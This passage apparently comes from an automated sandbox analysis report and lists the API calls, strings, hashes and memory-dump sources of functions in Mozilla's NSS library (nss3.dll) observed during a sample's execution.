                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4877AC
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(-0000000D), ref: 6C4877C4
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C4877DB
                                                                                                                                                                                                                          • strrchr.VCRUNTIME140(?,0000002F), ref: 6C487821
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6C487837
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C48785B
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C48786F
                                                                                                                                                                                                                          • SECMOD_AddNewModuleEx.NSS3 ref: 6C4878AC
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4878BE
                                                                                                                                                                                                                          • SECMOD_AddNewModuleEx.NSS3 ref: 6C4878F3
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4878FC
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C48791C
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • kbi., xrefs: 6C487886
                                                                                                                                                                                                                          • dll, xrefs: 6C48788E
                                                                                                                                                                                                                          • name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6C4874C7
                                                                                                                                                                                                                          • ,defaultModDB,internalKeySlot, xrefs: 6C48748D, 6C4874AA
                                                                                                                                                                                                                          • extern:, xrefs: 6C48772B
                                                                                                                                                                                                                          • rdb:, xrefs: 6C487744
                                                                                                                                                                                                                          • dbm:, xrefs: 6C487716
                                                                                                                                                                                                                          • NSS Internal Module, xrefs: 6C4874A2, 6C4874C6
                                                                                                                                                                                                                          • sql:, xrefs: 6C4876FE
                                                                                                                                                                                                                          • Spac, xrefs: 6C487389
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
                                                                                                                                                                                                                          • String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
                                                                                                                                                                                                                          • API String ID: 3465160547-3797173233
                                                                                                                                                                                                                          • Opcode ID: c4c547b6c79fe121050a7cc6770649720d0bc5cf3f08a9c25f307871a960c193
                                                                                                                                                                                                                          • Instruction ID: a4bbd43e482a7678535af1245585c8077715f884b546495891264e56d4c2a694
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4c547b6c79fe121050a7cc6770649720d0bc5cf3f08a9c25f307871a960c193
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC52F0B1E063019BEF11DFA4CC19FAA7BB4AF06308F154028FD09A6B41E771E955CB96
                                                                                                                                                                                                                          Function 6C4ABFF0 Relevance: 75.9, APIs: 31, Strings: 12, Instructions: 624memorystringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C4AC0C8
                                                                                                                                                                                                                            • Part of subcall function 6C539440: LeaveCriticalSection.KERNEL32 ref: 6C5395CD
                                                                                                                                                                                                                            • Part of subcall function 6C539440: TlsGetValue.KERNEL32 ref: 6C539622
                                                                                                                                                                                                                            • Part of subcall function 6C539440: _PR_MD_NOTIFYALL_CV.NSS3 ref: 6C53964E
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C4AC0AE
                                                                                                                                                                                                                            • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C5391AA
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539212
                                                                                                                                                                                                                            • Part of subcall function 6C539090: _PR_MD_WAIT_CV.NSS3 ref: 6C53926B
                                                                                                                                                                                                                            • Part of subcall function 6C460600: GetLastError.KERNEL32(?,?,?,?,?,6C4605E2), ref: 6C460642
                                                                                                                                                                                                                            • Part of subcall function 6C460600: TlsGetValue.KERNEL32(?,?,?,?,?,6C4605E2), ref: 6C46065D
                                                                                                                                                                                                                            • Part of subcall function 6C460600: GetLastError.KERNEL32 ref: 6C460678
                                                                                                                                                                                                                            • Part of subcall function 6C460600: PR_snprintf.NSS3(?,00000014,error %d,00000000), ref: 6C46068A
                                                                                                                                                                                                                            • Part of subcall function 6C460600: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C460693
                                                                                                                                                                                                                            • Part of subcall function 6C460600: PR_SetErrorText.NSS3(00000000,?), ref: 6C46069D
                                                                                                                                                                                                                            • Part of subcall function 6C460600: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,92AB236F,?,?,?,?,?,6C4605E2), ref: 6C4606CA
                                                                                                                                                                                                                            • Part of subcall function 6C460600: PR_SetError.NSS3(FFFFE8A9,00000000,?,?,?,?,?,6C4605E2), ref: 6C4606E6
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C4AC0F2
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C4AC10E
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C4AC081
                                                                                                                                                                                                                            • Part of subcall function 6C539440: TlsGetValue.KERNEL32 ref: 6C53945B
                                                                                                                                                                                                                            • Part of subcall function 6C539440: TlsGetValue.KERNEL32 ref: 6C539479
                                                                                                                                                                                                                            • Part of subcall function 6C539440: EnterCriticalSection.KERNEL32 ref: 6C539495
                                                                                                                                                                                                                            • Part of subcall function 6C539440: TlsGetValue.KERNEL32 ref: 6C5394E4
                                                                                                                                                                                                                            • Part of subcall function 6C539440: TlsGetValue.KERNEL32 ref: 6C539532
                                                                                                                                                                                                                            • Part of subcall function 6C539440: LeaveCriticalSection.KERNEL32 ref: 6C53955D
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C4AC068
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                            • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                            • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                            • Part of subcall function 6C460600: GetProcAddress.KERNEL32(?,?), ref: 6C460623
                                                                                                                                                                                                                          • _NSSUTIL_UTF8ToWide.NSS3(?), ref: 6C4AC14F
                                                                                                                                                                                                                          • PR_LoadLibraryWithFlags.NSS3 ref: 6C4AC183
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4AC18E
                                                                                                                                                                                                                          • PR_LoadLibrary.NSS3(?), ref: 6C4AC1A3
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C4AC1D4
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C4AC1F3
                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C5D2318,6C4ACA70), ref: 6C4AC210
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C4AC22B
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C4AC247
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C4AC26A
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C4AC287
                                                                                                                                                                                                                          • PR_UnloadLibrary.NSS3(?), ref: 6C4AC2D0
                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_DEBUG_PKCS11_MODULE), ref: 6C4AC392
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C4AC3AB
                                                                                                                                                                                                                          • PR_NewLogModule.NSS3(nss_mod_log), ref: 6C4AC3D1
                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_FORCE_TOKEN_LOCK), ref: 6C4AC782
                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD), ref: 6C4AC7B5
                                                                                                                                                                                                                          • PR_UnloadLibrary.NSS3(?), ref: 6C4AC7CC
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE097,00000000), ref: 6C4AC82E
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C4AC8BF
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6C4AC8D5
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4AC900
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C4AC9C7
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4AC9E5
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4ACA5A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Monitor$Value$Enter$CriticalExitSection$Error$LeaveLibrary$Alloc_SecureUtilfree$ArenaLastLoadUnloadstrcmp$AddressCallFlagsModuleOnceProcR_snprintfTextWideWithmemcpystrlen
                                                                                                                                                                                                                          • String ID: FC_GetFunctionList$FC_GetInterface$NSC_GetFunctionList$NSC_GetInterface$NSC_ModuleDBFunc$NSS_DEBUG_PKCS11_MODULE$NSS_DISABLE_UNLOAD$NSS_FORCE_TOKEN_LOCK$NSS_ReturnModuleSpecData$PKCS 11$Vendor NSS FIPS Interface$nss_mod_log
                                                                                                                                                                                                                          • API String ID: 4243957313-3613044529
                                                                                                                                                                                                                          • Opcode ID: 8fa78149976e358769a2f98d835e85fdf530f8d3a693e7b9e834e0150774b093
                                                                                                                                                                                                                          • Instruction ID: 9914a5ae89b6dfb806de336287ea3d49d91c5d046dd2eecbc07a9fcee54b9f11
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fa78149976e358769a2f98d835e85fdf530f8d3a693e7b9e834e0150774b093
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4429FB5A003059FDB40DF95CC46F5ABBB1FB65308F014028E8169BB29E732E956CF99
                                                                                                                                                                                                                          Function 6C583FC0 Relevance: 70.5, APIs: 37, Strings: 3, Instructions: 485stringprocessCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • malloc.MOZGLUE(00000008), ref: 6C583FD5
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C583FFE
                                                                                                                                                                                                                          • malloc.MOZGLUE(-00000003), ref: 6C584016
                                                                                                                                                                                                                          • strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,6C5BFC62), ref: 6C58404A
                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C58407E
                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C5840A4
                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C5840D7
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C584112
                                                                                                                                                                                                                          • malloc.MOZGLUE(00000000), ref: 6C58411E
                                                                                                                                                                                                                          • __p__environ.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 6C58414D
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C584160
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C58416C
                                                                                                                                                                                                                          • malloc.MOZGLUE(?), ref: 6C5841AB
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NSPR_INHERIT_FDS=,00000011), ref: 6C5841EF
                                                                                                                                                                                                                          • qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,00000004,6C584520), ref: 6C584244
                                                                                                                                                                                                                          • GetEnvironmentStrings.KERNEL32 ref: 6C58424D
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C584263
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C584283
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5842B7
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5842E4
                                                                                                                                                                                                                          • malloc.MOZGLUE(00000002), ref: 6C5842FA
                                                                                                                                                                                                                          • FreeEnvironmentStringsA.KERNEL32(?), ref: 6C584342
                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 6C5843AB
                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 6C5843B2
                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4), ref: 6C5843B9
                                                                                                                                                                                                                          • FreeEnvironmentStringsA.KERNEL32(?), ref: 6C584403
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C584410
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 6C58445E
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 6C58446B
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C584482
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C584492
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C5844A4
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6C5844B2
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE896,00000000), ref: 6C5844BE
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C5844C7
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C5844D5
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C5844EA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$Errormallocstrlen$Handle$EnvironmentStringsmemset$Free$CloseCreateLastProcessValue__p__environqsortstrncmpstrpbrk
                                                                                                                                                                                                                          • String ID: =$D$NSPR_INHERIT_FDS=
                                                                                                                                                                                                                          • API String ID: 3116300875-3553733109
                                                                                                                                                                                                                          • Opcode ID: d54afce7b9175f5d62e1973f4a5a7d0c5437ff73d0036e5ee7f8493703f0f3d6
                                                                                                                                                                                                                          • Instruction ID: 28369047491135e8cceb796782b65f3bc8d5fcedb49f9f93db5ed179817a8278
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d54afce7b9175f5d62e1973f4a5a7d0c5437ff73d0036e5ee7f8493703f0f3d6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B022770E063619FEB10CF69CC547AEBBB8AF16308F254128DC56ABB41D771E905CB91
                                                                                                                                                                                                                          Function 6C4D4840 Relevance: 63.4, APIs: 29, Strings: 7, Instructions: 351memorystringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,?,6C4B601B,?,00000000,?), ref: 6C4D486F
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,?,?,00000000), ref: 6C4D48A8
                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 6C4D48BE
                                                                                                                                                                                                                          • NSSUTIL_ArgSkipParameter.NSS3(?,?,?,?,?,00000000), ref: 6C4D48DE
                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,00000000), ref: 6C4D48F5
                                                                                                                                                                                                                          • NSSUTIL_ArgSkipParameter.NSS3(00000000,?,?,?,?,?,?,00000000), ref: 6C4D490A
                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(?,?,?,?,?,?,00000000), ref: 6C4D4919
                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,00000000), ref: 6C4D493F
                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D4970
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000001), ref: 6C4D49A0
                                                                                                                                                                                                                          • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C4D49AD
                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D49D4
                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(00000001,?), ref: 6C4D49F4
                                                                                                                                                                                                                          • NSSUTIL_ArgDecodeNumber.NSS3(00000000), ref: 6C4D4A10
                                                                                                                                                                                                                          • NSSUTIL_ArgParseSlotFlags.NSS3(slotFlags,00000000), ref: 6C4D4A27
                                                                                                                                                                                                                          • NSSUTIL_ArgReadLong.NSS3(timeout,00000000,00000000,00000000), ref: 6C4D4A3D
                                                                                                                                                                                                                          • NSSUTIL_ArgGetParamValue.NSS3(askpw,00000000), ref: 6C4D4A4F
                                                                                                                                                                                                                          • PL_strcasecmp.NSS3(00000000,every), ref: 6C4D4A6C
                                                                                                                                                                                                                          • PL_strcasecmp.NSS3(00000000,timeout), ref: 6C4D4A81
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D4AAB
                                                                                                                                                                                                                          • NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C4D4ABE
                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(00000000,hasRootCerts,0000000C), ref: 6C4D4ADC
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D4B17
                                                                                                                                                                                                                          • NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C4D4B33
                                                                                                                                                                                                                            • Part of subcall function 6C4D4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4D413D
                                                                                                                                                                                                                            • Part of subcall function 6C4D4120: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C4D4162
                                                                                                                                                                                                                            • Part of subcall function 6C4D4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4D416B
                                                                                                                                                                                                                            • Part of subcall function 6C4D4120: PL_strncasecmp.NSS3(2BMl,?,00000001), ref: 6C4D4187
                                                                                                                                                                                                                            • Part of subcall function 6C4D4120: NSSUTIL_ArgSkipParameter.NSS3(2BMl), ref: 6C4D41A0
                                                                                                                                                                                                                            • Part of subcall function 6C4D4120: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4D41B4
                                                                                                                                                                                                                            • Part of subcall function 6C4D4120: PL_strncasecmp.NSS3(00000000,0000003D,?), ref: 6C4D41CC
                                                                                                                                                                                                                            • Part of subcall function 6C4D4120: NSSUTIL_ArgFetchValue.NSS3(2BMl,?), ref: 6C4D4203
                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(00000000,hasRootTrust,0000000C), ref: 6C4D4B53
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D4B94
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4D4BA7
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D4BB7
                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D4BC8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: isspace$Valuefree$L_strncasecmp$Alloc_ParamParameterSkipUtil$FetchL_strcasecmpstrlen$ArenaDecodeFlagsLongNumberParseReadSlotmemsetstrcpystrncpy
                                                                                                                                                                                                                          • String ID: askpw$every$hasRootCerts$hasRootTrust$rootFlags$slotFlags$timeout
                                                                                                                                                                                                                          • API String ID: 3791087267-1256704202
                                                                                                                                                                                                                          • Opcode ID: 5e7dad37dc284b67b2e2beb91f38011d4a3aa333399e1b9fc20bc1c4a9b26d95
                                                                                                                                                                                                                          • Instruction ID: e7edef33c227cceac4331c04802834058f915c1b7ea3aa212db52f9d94d7a7a6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e7dad37dc284b67b2e2beb91f38011d4a3aa333399e1b9fc20bc1c4a9b26d95
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4C12874E053558BEB00EFA59C60FAE7FB4AF06289F161069EC95A7B01E321B905C7A1
                                                                                                                                                                                                                          Function 6C496D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,6C59A8EC,0000006C), ref: 6C496DC6
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,6C59A958,0000006C), ref: 6C496DDB
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,6C59A9C4,00000078), ref: 6C496DF1
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,6C59AA3C,0000006C), ref: 6C496E06
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,6C59AAA8,00000060), ref: 6C496E1C
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C496E38
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,?), ref: 6C496E76
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C49726F
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C497283
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
